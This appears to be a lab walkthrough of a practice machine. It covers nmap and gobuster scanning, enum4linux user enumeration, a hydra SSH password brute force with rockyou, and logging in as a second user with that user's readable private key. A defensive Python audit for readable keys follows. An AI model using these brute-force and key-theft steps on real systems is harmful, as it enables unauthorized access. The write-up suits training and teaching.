Deploy the machine and connect to our network
Find the services exposed by the machine
Use nmap -sS -A -p- (ip) to scan all TCP ports; the scan returns:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
What is the name of the hidden directory on the web server (enter the name without /)?
Use gobuster dir -u (ip) -w /usr/share/wordlists/dirb/common.txt to look for hidden directories.
Use brute-forcing to find the username and password.
Use enum4linux -a (ip) to enumerate users:
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Use hydra with a wordlist to brute-force the password: hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt.gz ssh://(ip)
What is the username?
What is the password?
What service do you use to access the server (answer in abbreviation, all caps)?
Enumerate the machine to find any vectors for privilege escalation
Once logged in as jan, locate the user kay and list all hidden files in kay's home directory. The pass.bak file cannot be read, but there is a hidden .ssh directory containing the private key (id_rsa), which is readable.
Copy the entire private key into a file (here called hash) and use the ssh2john script to convert it into a hash: python ssh2john.py hash > sshkey
What is the name of the other user you found (all lower case)?
If you have found another user, what can you do with this information?
Use the recovered private key to log in via SSH: ssh -i (path to the saved private key) kay@(ip). This logs you in as kay, who is able to cat pass.bak and find the final password.
What is the final password you obtain?
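As an added defender-side example (not part of the original walkthrough), a small audit that finds the misconfiguration exploited above: a private key or backup file in one user's home that another local user can read. The file names checked and the constructed demo tree are assumptions for this example.

```python
import os
import stat
import tempfile
from pathlib import Path

# Files a low-privilege account must never be able to read in another
# user's home. The set is an assumption for this example.
SENSITIVE_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519", "pass.bak"}


def exposed_files(home_root):
    """Return (path, mode) for sensitive files under any home directory
    whose permissions grant read access to group or others."""
    findings = []
    for path in Path(home_root).rglob("*"):  # pathlib.rglob matches dotfiles
        if not path.is_file() or path.name not in SENSITIVE_NAMES:
            continue
        mode = path.stat().st_mode
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append((str(path), oct(stat.S_IMODE(mode))))
    return findings


def build_demo_tree(root):
    """Constructed sample: two home directories, one leaking a readable key."""
    kay_ssh = Path(root, "kay", ".ssh")
    kay_ssh.mkdir(parents=True)
    leaked = kay_ssh / "id_rsa"
    leaked.write_text("-----BEGIN OPENSSH PRIVATE KEY-----\n(placeholder)\n")
    leaked.chmod(0o644)  # world-readable: the misconfiguration to catch
    secret = Path(root, "kay", "pass.bak")
    secret.write_text("placeholder\n")
    secret.chmod(0o600)  # owner-only: correct, must not be reported
    jan_ssh = Path(root, "jan", ".ssh")
    jan_ssh.mkdir(parents=True)
    ok_key = jan_ssh / "id_rsa"
    ok_key.write_text("placeholder\n")
    ok_key.chmod(0o600)  # correct


def run_demo():
    """Build the constructed tree in a temp dir and return findings as
    (path relative to the root, octal mode)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return [(Path(p).relative_to(tmp).as_posix(), m)
                for p, m in exposed_files(tmp)]


if __name__ == "__main__":
    for rel, mode in run_demo():
        print(f"EXPOSED {rel} mode {mode}")  # prints EXPOSED kay/.ssh/id_rsa mode 0o644
```

Point the function at /home on a real host to report every key or backup file that a foothold account such as jan could read.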